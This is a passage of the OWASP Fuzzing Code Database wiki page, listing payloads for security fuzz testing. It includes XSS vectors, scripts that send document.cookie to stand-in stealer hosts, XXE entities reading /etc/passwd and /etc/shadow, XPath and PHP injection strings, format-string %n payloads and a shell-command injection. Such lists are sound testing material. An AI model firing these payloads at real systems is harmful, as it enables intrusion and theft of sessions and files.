&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	</feed>